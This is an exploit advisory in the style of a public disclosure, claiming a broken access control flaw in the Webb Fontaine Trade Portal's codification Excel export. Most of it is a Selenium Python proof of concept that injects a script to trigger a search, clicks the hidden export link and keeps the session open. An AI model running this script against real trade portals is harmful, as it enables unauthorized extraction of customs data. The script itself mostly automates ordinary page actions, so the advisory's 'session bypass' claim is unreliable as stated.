============================================================================================================================================= | # Title : Webb Fontaine Trade Portal – Broken Access Control in Codification Export Endpoint Leads to Unauthorized Data Export | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) | | # Vendor : https://webbfontaine.com/fr/ | ============================================================================================================================================= [+] Summary : A security vulnerability was identified in the Webb Fontaine Trade Portal affecting the codification module (/trade/help/codification). The issue allows unauthorized users to trigger data export functionality via the /export/excel endpoint without proper validation of session state or user interaction. The backend fails to enforce strict access control and does not verify whether the export request originates from a legitimate user action. By initiating a crafted request after triggering a search operation, an attacker may retrieve sensitive codification data in Excel format. Additionally, the application relies on client-side interaction logic while lacking robust server-side verification, resulting in a Broken Access Control / Session Handling flaw. This vulnerability may allow unauthorized data extraction and represents a significant risk in environments handling sensitive trade and customs information. [+] POC : import os import time from selenium import webdriver from selenium.webdriver.chrome.service import Service from selenium.webdriver.chrome.options import Options from selenium.webdriver.common.by import By from webdriver_manager.chrome import ChromeDriverManager from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC BASE_DIR = r"C:\Users\sangrava\Desktop\SANGRAVA_LOGISTICS_HUB" os.makedirs(BASE_DIR, exist_ok=True) def run_sangrava_long_session(): print("[*] Launching SANGRAVA Persistent Engine...") chrome_options = Options() chrome_options.add_experimental_option("detach", True) prefs = { "download.default_directory": BASE_DIR, "download.prompt_for_download": False, "directory_upgrade": True, "safebrowsing.enabled": True } chrome_options.add_experimental_option("prefs", prefs) driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=chrome_options) driver.maximize_window() try: url = "https://example/trade/help/codification?lang=en" print(f"[*] Navigating to: {url}") driver.get(url) wait = WebDriverWait(driver, 30) print("[*] Injecting session bypass values...") injection_script = """ var field = document.getElementsByName('reference')[0]; if(field) { field.value = 'attachedDocument'; field.dispatchEvent(new Event('change')); document.getElementById('search').click(); return true; } return false; """ driver.execute_script(injection_script) print("[+] Search triggered. Waiting for server response...") time.sleep(10) print("[*] Attempting to grab the hidden Excel link...") try: excel_xpath = "//a[contains(@href, 'export/excel')]" excel_link = wait.until(EC.presence_of_element_located((By.XPATH, excel_xpath))) driver.execute_script("arguments[0].click();", excel_link) print("[SUCCESS] Download initiated.") except: print("[!] Excel link not found. It might be a session-only generation.") print("\n" + "="*50) print("[STAY ACTIVE] Browser will remain open for 60 minutes.") print("[ACTION] You can now interact with the browser manually.") print("="*50) time.sleep(3600) except Exception as e: print(f"[CRITICAL] Error: {e}") finally: print("[*] Script execution finished. Detached session remains.") if __name__ == "__main__": run_sangrava_long_session() Greetings to :============================================================================== jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)| ============================================================================================